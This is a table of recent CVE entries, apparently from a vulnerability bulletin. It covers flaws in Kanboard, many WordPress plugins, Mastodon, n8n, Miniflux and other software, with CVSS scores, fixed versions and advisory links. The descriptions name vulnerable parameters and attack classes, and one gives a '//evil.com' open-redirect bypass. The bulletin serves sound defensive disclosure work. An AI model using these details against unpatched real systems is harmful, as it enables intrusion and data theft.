| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below have an LDAP Injection vulnerability in the LDAP authentication mechanism. User-supplied input is directly substituted into LDAP search filters without proper sanitization, allowing attackers to enumerate all LDAP users, discover sensitive user attributes, and perform targeted attacks against specific accounts. This issue is fixed in version 1.2.49. | 2026-01-08 | 5.3 | CVE-2026-21880 | https://github.com/kanboard/kanboard/security/advisories/GHSA-v66r-m28r-wmq7 https://github.com/kanboard/kanboard/commit/dd374079f7c2d1dab74c1680960e684ff8668586 https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| kanboard--kanboard | Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below are vulnerable to an Open Redirect attack that allows malicious actors to redirect authenticated users to attacker-controlled websites. By crafting URLs such as //evil.com, attackers can bypass the filter_var($url, FILTER_VALIDATE_URL) validation check. This vulnerability could be exploited to conduct phishing attacks, steal user credentials, or distribute malware. The issue is fixed in version 1.2.49. | 2026-01-08 | 4.7 | CVE-2026-21879 | https://github.com/kanboard/kanboard/security/advisories/GHSA-mhv9-7m9w-7hcq https://github.com/kanboard/kanboard/commit/93bcae03301a6d34185a8dba977417e6b3de519f https://github.com/kanboard/kanboard/releases/tag/v1.2.49 |
| kentothemes--Latest Tabs | The Latest Tabs plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings update handler in admin-page.php. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14999 | https://www.wordfence.com/threat-intel/vulnerabilities/id/837f49e6-dcba-4451-bbbe-14890ab87207?source=cve https://plugins.trac.wordpress.org/browser/kento-latest-tabs/trunk/admin-page.php#L7 |
| kodezen--aBlocks WordPress Gutenberg Blocks, User Dashboard Builder, Popup Builder, Form Builder & GSAP Animation Builder | The aBlocks - WordPress Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data and disclosure of sensitive information due to missing capability checks on multiple AJAX actions in all versions up to, and including, 2.4.0. This makes it possible for authenticated attackers, with subscriber level access and above, to read plugin settings including block visibility, maintenance mode configuration, and third-party email marketing API keys, as well as read sensitive configuration data including API keys for email marketing services. | 2026-01-07 | 5.4 | CVE-2025-12449 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c10600ae-1ff0-4f12-ae53-39d9342640f4?source=cve https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/ajax/settings.php#L16 https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/classes/abstract-request-handler.php#L486 https://plugins.trac.wordpress.org/browser/ablocks/tags/2.4.0/includes/assets.php#L353 |
| kromitgmbh--titra | Titra is open source project time tracking software. Versions 0.99.49 and below have Improper Access Control, allowing users to view and edit other users' time entries in private projects they have not been granted access to. This issue is fixed in version 0.99.50. | 2026-01-07 | 6.8 | CVE-2026-21694 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-mr2r-wjf8-cj3c https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938 |
| kromitgmbh--titra | Titra is open source project time tracking software. In versions 0.99.49 and below, an API has a Mass Assignment vulnerability which allows authenticated users to inject arbitrary fields into time entries, bypassing business logic controls via the customfields parameter. The affected endpoint uses the JavaScript spread operator (...customfields) to merge user-controlled input directly into the database document. While customfields is validated as an Object type, there is no validation of which keys are permitted inside that object. This allows attackers to overwrite protected fields such as userId, hours, and state. The issue is fixed in version 0.99.50. | 2026-01-07 | 4.3 | CVE-2026-21695 | https://github.com/kromitgmbh/titra/security/advisories/GHSA-gc65-vr47-jppq https://github.com/kromitgmbh/titra/commit/29e6b88eca005107729e45a6f1731cf0fa5f8938 |
| Leica Geosystems AG--Leica Geosystems GR10/GR25/GR30/GR50 GNSS | Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can trick logged-in users into executing unauthorized actions by crafting malicious web pages that submit requests to the application. | 2026-01-07 | 5.3 | CVE-2019-25259 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 46090 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry Leica Geosystems Vendor Homepage |
| liangshao--Flashcard Plugin for WordPress | The Flashcard plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 0.9 via the 'source' attribute of the 'flashcard' shortcode. This makes it possible for authenticated attackers, with contributor level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2026-01-07 | 6.5 | CVE-2025-14867 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fcc6e5-1f90-41e7-8d5a-2bfe8cbf46fa?source=cve https://plugins.trac.wordpress.org/browser/flashcard/tags/0.9/flashcard.php?marks=73,109#L73 |
| lnbadmin1--Nearby Now Reviews | The Nearby Now Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data_tech' parameter of the nn-tech shortcode in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13853 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8dc991ea-0d00-4734-9b9a-5af759e83540?source=cve https://plugins.trac.wordpress.org/browser/nearby-now-reviews/trunk/nn-reviews.php#L160 https://plugins.trac.wordpress.org/browser/nearby-now-reviews/tags/5.2/nn-reviews.php#L160 |
| loopus--WP Cost Estimation & Payment Forms Builder | The WP Cost Estimation plugin for WordPress is vulnerable to Upload Directory Traversal in versions before 9.660 via the uploadFormFiles function. This allows attackers to overwrite any file with a whitelisted type on an affected site. | 2026-01-08 | 6.5 | CVE-2019-25295 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65a9e877-e870-4e36-985d-c0629abe3f78?source=cve https://www.wordfence.com/blog/2019/02/vulnerabilities-patched-in-wp-cost-estimation-plugin/ https://codecanyon.net/item/wp-cost-estimation-payment-forms-builder/7818230 |
| mamurjor--Mamurjor Employee Info | The Mamurjor Employee Info plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing nonce validation on multiple administrative functions. This makes it possible for unauthenticated attackers to create, update, or delete employee records, departments, designations, salary grades, education records, and salary payments via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13990 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e323b87-7b2e-4e5c-94a4-a4a0712f50ba?source=cve https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L10 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L30 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/trunk/admin/admin.php#L47 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L10 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L30 https://plugins.trac.wordpress.org/browser/mamurjor-employee-info/tags/1.0.0/admin/admin.php#L47 |
| manchumahara--CBX Bookmark & Favorite | The CBX Bookmark & Favorite plugin for WordPress is vulnerable to generic SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 6.5 | CVE-2025-13652 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve https://plugins.trac.wordpress.org/changeset/3413499/ |
| marceljm--Featured Image from URL (FIFU) | The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.3.1. This is due to insufficient validation of user-supplied URLs before passing them to the getimagesize() function in the Elementor widget integration. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services via the fifu_input_url parameter in the FIFU Elementor widget granted they have permissions to use Elementor. | 2026-01-10 | 4.3 | CVE-2025-13393 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b7115070-b84d-4d69-993a-f512b9f9c081?source=cve https://plugins.trac.wordpress.org/browser/featured-image-from-url/trunk/elementor/widgets/widget.php#L94 https://plugins.trac.wordpress.org/browser/featured-image-from-url/trunk/elementor/widgets/widget.php#L121 https://research.cleantalk.org/cve-2025-13393/ https://plugins.trac.wordpress.org/changeset/3428744/ |
| Marketing Fire, LLC--LoginWP - Pro | Missing Authorization vulnerability in Marketing Fire, LLC LoginWP - Pro allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects LoginWP - Pro: from n/a through 4.0.8.5. | 2026-01-05 | 6.5 | CVE-2025-39561 | https://vdp.patchstack.com/database/wordpress/plugin/loginwp-pro/vulnerability/wordpress-loginwp-pro-plugin-4-0-8-5-broken-access-control-vulnerability?_s_id=cve |
| mastodon--mastodon | Mastodon is a free, open-source social network server based on ActivityPub. Mastodon 4.3 added notifications of severed relationships, allowing end-users to inspect the relationships they lost as the result of a moderation action. The code allowing users to download lists of severed relationships for a particular event fails to check the owner of the list before returning the lost relationships. Any registered local user can access the list of lost followers and followed users caused by any severance event, and go through all severance events this way. The leaked information does not include the name of the account which has lost follows and followers. This has been fixed in Mastodon v4.3.17, v4.4.11 and v4.5.4. | 2026-01-08 | 6.5 | CVE-2026-22246 | https://github.com/mastodon/mastodon/security/advisories/GHSA-ww85-x9cp-5v24 https://github.com/mastodon/mastodon/commit/68e30985ca7afdb89af1b2e9dc962e1993dc8076 https://github.com/mastodon/mastodon/commit/b2bcd34486fd6681cc0f30028086ef0f47282adf https://github.com/mastodon/mastodon/commit/c1fb6893c5175d74c074f6f786d504c8bc610d57 |
| matiasanca--Cool YT Player | The Cool YT Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'videoid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13849 | https://www.wordfence.com/threat-intel/vulnerabilities/id/590bdf82-8006-4729-96e5-42b0d1552d19?source=cve https://plugins.trac.wordpress.org/browser/cool-yt-player/trunk/includes/youtube_video_wrapper.php#L58 https://plugins.trac.wordpress.org/browser/cool-yt-player/tags/1.0/includes/youtube_video_wrapper.php#L58 |
| mattiaspkallio--Snillrik Restaurant | The Snillrik Restaurant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'menu_style' shortcode attribute in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14112 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5fb52c19-6816-423d-ab3a-6b5b2ff21e03?source=cve https://plugins.trac.wordpress.org/browser/snillrik-restaurant-menu/trunk/classes/shortcodes.php#L42 https://plugins.trac.wordpress.org/browser/snillrik-restaurant-menu/tags/2.2.1/classes/shortcodes.php#L42 |
| metodiew--Quote Comments | The Quote Comments plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 3.0.0. This is due to missing authorization checks in the quotecomments_add_admin function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary plugin options via the 'action' parameter. | 2026-01-07 | 5.3 | CVE-2025-14370 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ebe0767-db22-4995-bdf1-5ebb48f960e9?source=cve https://plugins.trac.wordpress.org/browser/quote-comments/tags/3.0.0/quote-comments.php#L309 |
| Microsoft--Microsoft Edge for Android | User interface (ui) misrepresentation of critical information in Microsoft Edge for Android allows an authorized attacker to perform spoofing over a network. | 2026-01-07 | 5.5 | CVE-2025-62224 | Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability |
| miniflux--v2 | Miniflux 2 is an open source feed reader. Prior to version 2.2.16, Miniflux's media proxy endpoint (`GET /proxy/{encodedDigest}/{encodedURL}`) can be abused to perform Server-Side Request Forgery (SSRF). An authenticated user can cause Miniflux to generate a signed proxy URL for attacker-chosen media URLs embedded in feed entry content, including internal addresses (e.g., localhost, private RFC1918 ranges, or link-local metadata endpoints). Requesting the resulting `/proxy/...` URL makes Miniflux fetch and return the internal response. Version 2.2.16 fixes the issue. | 2026-01-08 | 6.5 | CVE-2026-21885 | https://github.com/miniflux/v2/security/advisories/GHSA-xwh2-742g-w3wp |
| minnur--External Media | Server-Side Request Forgery (SSRF) vulnerability in minnur External Media allows Server Side Request Forgery. This issue affects External Media: from n/a through 1.0.36. | 2026-01-07 | 4.9 | CVE-2025-49335 | https://patchstack.com/database/wordpress/plugin/external-media/vulnerability/wordpress-external-media-plugin-1-0-36-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| mitchoyoshitaka--Stumble! for WordPress | The Stumble! for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14128 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19e1421d-8cb4-44b6-a982-769539b19582?source=cve https://wordpress.org/plugins/stumble-for-wordpress/ https://plugins.trac.wordpress.org/browser/stumble-for-wordpress/trunk/stumble.php#L143 https://plugins.trac.wordpress.org/browser/stumble-for-wordpress/tags/1.1.1/stumble.php#L143 |
| mohammed_kaludi--AMP for WP Accelerated Mobile Pages | The AMP for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG file uploads in all versions up to, and including, 1.1.10. This is due to insufficient sanitization of SVG file content that only removes `<script>` tags while allowing other XSS vectors such as event handlers (onload, onerror, onmouseover), foreignObject elements, and SVG animation attributes. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via malicious SVG file uploads that will execute whenever a user views the uploaded file. | 2026-01-09 | 6.4 | CVE-2026-0627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ed23318-3b47-4336-a3aa-6b09f3911926?source=cve https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/trunk/templates/features.php#L10373 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.10/templates/features.php#L10373 https://plugins.trac.wordpress.org/changeset/3434946/accelerated-mobile-pages/trunk/templates/features.php?old=3426181&old_path=accelerated-mobile-pages%2Ftrunk%2Ftemplates%2Ffeatures.php |
| mohammed_kaludi--AMP for WP Accelerated Mobile Pages | The AMP for WP - Accelerated Mobile Pages plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.9. This is due to inverted nonce verification logic in the amp_theme_ajaxcomments AJAX handler, which rejects requests with VALID nonces and accepts requests with MISSING or INVALID nonces. This makes it possible for unauthenticated attackers to submit comments on behalf of logged-in users via a forged request granted they can trick a user into performing an action such as clicking on a link, and the plugin's template mode is enabled. | 2026-01-07 | 4.3 | CVE-2025-14468 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d195034-4617-474d-a4b1-b299c1607f89?source=cve https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L119 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L50 https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.1.9/templates/template-mode/template-mode.php#L698 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3426181%40accelerated-mobile-pages%2Ftrunk&old=3402644%40accelerated-mobile-pages%2Ftrunk&sfp_email=&sfph_mail=#file4 |
| moosend--Moosend Landing Pages | The Moosend Landing Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the moosend_landings_auth_get function in all versions up to, and including, 1.1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the 'moosend_landing_api_key' option value. | 2026-01-07 | 5.3 | CVE-2025-13496 | https://www.wordfence.com/threat-intel/vulnerabilities/id/eeb4b3b1-47ae-4314-a386-832949456f81?source=cve https://plugins.trac.wordpress.org/browser/moosend-landing-pages/trunk/forms/auth-request.php#L7 https://plugins.trac.wordpress.org/browser/moosend-landing-pages/tags/1.1.6/forms/auth-request.php#L7 |
| mountaingrafix--MG AdvancedOptions | The MG AdvancedOptions plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-09 | 6.1 | CVE-2025-13892 | https://www.wordfence.com/threat-intel/vulnerabilities/id/86358a01-bf69-4a7f-8b78-a0d42d362d96?source=cve https://plugins.trac.wordpress.org/browser/mg-advancedoptions/trunk/mg-advancedoptions/MG_AdvancedOptions.php#L96 https://plugins.trac.wordpress.org/browser/mg-advancedoptions/trunk/mg-advancedoptions/MG_AdvancedOptions.php#L58 |
| mstoic--Mstoic Shortcodes | The Mstoic Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'start' parameter of the ms_youtube_embeds shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14144 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e83c039-9b15-4e0c-8b07-3b906938c138?source=cve https://plugins.trac.wordpress.org/browser/mstoic-shortcodes/trunk/functions/shortcodes/youtube_embeds.php#L117 https://plugins.trac.wordpress.org/browser/mstoic-shortcodes/tags/2.0/functions/shortcodes/youtube_embeds.php#L117 |
| mtcaptcha--MTCaptcha WordPress Plugin | The MTCaptcha WordPress Plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.2. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update the plugin settings, including sensitive values like the private key, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13520 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e8c1e568-7170-40d6-b522-2c89725e0501?source=cve https://plugins.trac.wordpress.org/browser/mtcaptcha/trunk/mt-captcha.php#L410 https://plugins.trac.wordpress.org/browser/mtcaptcha/tags/2.7.2/mt-captcha.php#L410 |
| Munir Kamal--Block Slider | Missing Authorization vulnerability in Munir Kamal Block Slider allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Block Slider: from n/a through 2.2.3. | 2026-01-08 | 6.5 | CVE-2026-22522 | https://patchstack.com/database/wordpress/plugin/block-slider/vulnerability/wordpress-block-slider-plugin-2-2-3-broken-access-control-vulnerability?_s_id=cve |
| N/A--Elliptic | The ECDSA implementation of the Elliptic package generates incorrect signatures if an interim value of 'k' (as computed in step 3.2 of RFC 6979, https://datatracker.ietf.org/doc/html/rfc6979) has leading zeros, and the resulting faulty signatures are susceptible to cryptanalysis that can expose the secret key. This happens because the byte length of 'k' is computed incorrectly, so 'k' is truncated during the computation. Legitimate transactions or communications will be broken as a result. Furthermore, due to the nature of the fault, attackers could, under certain conditions, derive the secret key if they obtain both a faulty signature generated by a vulnerable version of Elliptic and a correct signature for the same inputs. This issue affects all known versions of Elliptic (at the time of writing, versions less than or equal to 6.6.1). | 2026-01-08 | 5.6 | CVE-2025-14505 | https://www.herodevs.com/vulnerability-directory/cve-2025-14505 https://github.com/indutny/elliptic/issues/321 |
| n/a--invoiceninja | A security vulnerability has been detected in invoiceninja up to 5.12.38. The affected element is the function copy of the file /app/Jobs/Util/Import.php of the component Migration Import. The manipulation of the argument company_logo leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-07 | 4.7 | CVE-2026-0649 | VDB-339720 (invoiceninja Migration Import Import.php copy server-side request forgery); VDB-339720 CTI Indicators (IOB, IOC, IOA); Submit #721323 (invoiceninja <= 5.12.38 ssrf); https://note-hxlab.wetolink.com/share/fWqEpn5fX4rH |
| n/a--milvus | A security vulnerability has been detected in milvus up to 2.6.7. This vulnerability affects the function expr.Exec of the file pkg/util/expr/expr.go of the component HTTP Endpoint. The manipulation of the argument code leads to deserialization. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. A fix is planned for the next release 2.6.8. | 2026-01-05 | 6.3 | CVE-2025-15453 | VDB-339486 (milvus HTTP Endpoint expr.go expr.Exec deserialization); VDB-339486 CTI Indicators (IOB, IOC, IOA); Submit #719061 (milvus-io milvus latest Not Safe Remote Expression Execution); https://github.com/milvus-io/milvus/issues/46442 https://github.com/milvus-io/milvus/issues/46442#issuecomment-3672197450 https://github.com/milvus-io/milvus/issues/46442#issue-3743414836 https://github.com/milvus-io/milvus/milestone/139 |
| n8n-io--n8n | n8n is an open source workflow automation platform. In versions from 0.150.0 to before 2.2.2, an authentication bypass vulnerability in the Stripe Trigger node allows unauthenticated parties to trigger workflows by sending forged Stripe webhook events. The Stripe Trigger creates and stores a Stripe webhook signing secret when registering the webhook endpoint, but incoming webhook requests were not verified against this secret. As a result, any HTTP client that knows the webhook URL could send a POST request containing a matching event type, causing the workflow to execute as if a legitimate Stripe event had been received. This issue affects n8n users who have active workflows using the Stripe Trigger node. An attacker could potentially fake payment or subscription events and influence downstream workflow behavior. The practical risk is reduced by the fact that the webhook URL contains a high-entropy UUID; however, authenticated n8n users with access to the workflow can view this webhook ID. This issue has been patched in version 2.2.2. A temporary workaround for this issue involves users deactivating affected workflows or restricting access to workflows containing Stripe Trigger nodes to trusted users only. | 2026-01-08 | 6.5 | CVE-2026-21894 | https://github.com/n8n-io/n8n/security/advisories/GHSA-jf52-3f2h-h9j5 https://github.com/n8n-io/n8n/pull/22764 https://github.com/n8n-io/n8n/commit/a61a5991093c41863506888336e808ac1eff8d59 |
| nahian91--Awesome Hotel Booking | The Awesome Hotel Booking plugin for WordPress is vulnerable to unauthorized modification of data due to incorrect authorization in the room-single.php shortcode handler in all versions up to, and including, 1.0. This is due to the plugin relying solely on nonce verification without capability checks. This makes it possible for unauthenticated attackers to modify arbitrary booking records by obtaining a nonce from the public booking form. | 2026-01-07 | 5.3 | CVE-2025-14352 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4fe0a08e-eee2-4d48-bb38-dd58bff79118?source=cve https://plugins.trac.wordpress.org/browser/awesome-hotel-booking/trunk/admin/admin-shortcodes/inc/room-single.php#L67 https://plugins.trac.wordpress.org/browser/awesome-hotel-booking/tags/1.0/admin/admin-shortcodes/inc/room-single.php#L67 |
| nasa--CryptoLib | CryptoLib provides a software-only solution using the CCSDS Space Data Link Security Protocol - Extended Procedures (SDLS-EP) to secure communications between a spacecraft running the core Flight System (cFS) and a ground station. Prior to version 1.4.3, in base64urlDecode, padding-stripping dereferences input[inputLen - 1] before checking that inputLen > 0 or that input != NULL. For inputLen == 0, this becomes an OOB read at input[-1], potentially crashing the process. If input == NULL and inputLen == 0, it dereferences NULL - 1. This issue has been patched in version 1.4.3. | 2026-01-10 | 4.7 | CVE-2026-21899 | https://github.com/nasa/CryptoLib/security/advisories/GHSA-wc29-5hw7-mpj8 https://github.com/nasa/CryptoLib/releases/tag/v1.4.3 |
| Nawawi Jamili--Docket Cache | Missing Authorization vulnerability in Nawawi Jamili Docket Cache allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Docket Cache: from n/a through 24.07.04. | 2026-01-08 | 4.3 | CVE-2026-22492 | https://patchstack.com/database/wordpress/plugin/docket-cache/vulnerability/wordpress-docket-cache-plugin-24-07-04-broken-access-control-vulnerability?_s_id=cve |
| niklaslindemann--Bulk Landing Page Creator for WordPress LPagery | Missing Authorization vulnerability in niklaslindemann Bulk Landing Page Creator for WordPress LPagery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bulk Landing Page Creator for WordPress LPagery: from n/a through 2.4.9. | 2026-01-08 | 5.4 | CVE-2026-22490 | https://patchstack.com/database/wordpress/plugin/lpagery/vulnerability/wordpress-bulk-landing-page-creator-for-wordpress-lpagery-plugin-2-4-4-broken-access-control-vulnerability?_s_id=cve |
| ninjateam--FastDup Fastest WordPress Migration & Duplicator | The FastDup - Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.7 via the 'dir_path' parameter in the 'njt-fastdup/v1/template/directory-tree' REST API endpoint. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary directories on the server, which can contain sensitive information. | 2026-01-06 | 6.5 | CVE-2026-0604 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac97c729-4c75-429b-bbf2-27ca322be1cf?source=cve https://plugins.trac.wordpress.org/browser/fastdup/trunk/includes/Endpoint/TemplateApi.php#L219 https://plugins.trac.wordpress.org/browser/fastdup/tags/2.7/includes/Endpoint/TemplateApi.php#L219 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432226%40fastdup&new=3432226%40fastdup&sfp_email=&sfph_mail=#file3 |
| nsthemes--NS Ie Compatibility Fixer | The NS IE Compatibility Fixer plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 2.1.5. This is due to missing nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick an administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14845 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c25b462-cb9e-4250-bb17-9f2a0bd7665e?source=cve https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L29 https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_admin_option_dashboard.php#L30 https://plugins.trac.wordpress.org/browser/ns-ie-compatibility-fixer/tags/2.1.5/ns-admin-options/ns_settings_custom.php#L8 https://developer.wordpress.org/plugins/security/nonces/ https://developer.wordpress.org/reference/functions/wp_verify_nonce/ https://developer.wordpress.org/reference/functions/check_admin_referer/ |
| octobercms--october | October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Global Editor Settings permission could inject malicious HTML/JS into the stylesheet input at Markup Styles. A specially crafted input could break out of the intended `<style>` context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12. | 2026-01-10 | 6.1 | CVE-2025-61674 | https://github.com/octobercms/october/security/advisories/GHSA-gxxc-m74c-f48x |
| octobercms--october | October is a Content Management System (CMS) and web platform. Prior to versions 3.7.13 and 4.0.12, a cross-site scripting (XSS) vulnerability was identified in October CMS backend configuration forms. A user with the Customize Backend Styles permission could inject malicious HTML/JS into the stylesheet input at Styles in the Branding & Appearance settings. A specially crafted input could break out of the intended `<style>` context, allowing arbitrary script execution across backend pages for all users. This issue has been patched in versions 3.7.13 and 4.0.12. | 2026-01-10 | 6.1 | CVE-2025-61676 | https://github.com/octobercms/october/security/advisories/GHSA-wvpq-h33f-8rp6 |
| openchamp--Simcast | The Simcast plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.0. This is due to missing or incorrect nonce validation on the settingsPage function. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-14077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3917e1a-c230-46ad-9889-6ab233ecc4d0?source=cve https://plugins.trac.wordpress.org/browser/simcast/trunk/Simcast_OptionsManager.php#L257 https://plugins.trac.wordpress.org/browser/simcast/tags/1.0.0/Simcast_OptionsManager.php#L257 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.8.3, an open redirect vulnerability exists in the OpenCTI platform's SAML authentication endpoint (/auth/saml/callback). By manipulating the RelayState parameter, an attacker can force the server to issue a 302 redirect to any external URL, enabling phishing, credential theft, and arbitrary site redirection. This issue has been patched in version 6.8.3. | 2026-01-07 | 5.4 | CVE-2025-61782 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-jc3f-c62g-v7qw https://github.com/OpenCTI-Platform/opencti/commit/f755165a26888925c4a58018f7238ff92a0bd378 https://github.com/OpenCTI-Platform/opencti/releases/tag/6.8.3 |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment within the Document Check Out functionality. The JavaScript is executed whenever another user views the Action History Log. Fixed in OPEXUS eCASE Platform 11.14.1.0. | 2026-01-08 | 5.5 | CVE-2026-22231 | |
| OPEXUS--eCASE Audit | OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript in the "A or SIC Number" field within the Project Setup functionality. The JavaScript is executed whenever another user views the project. Fixed in OPEXUS eCASE Audit 11.14.2.0. | 2026-01-08 | 5.5 | CVE-2026-22232 | |
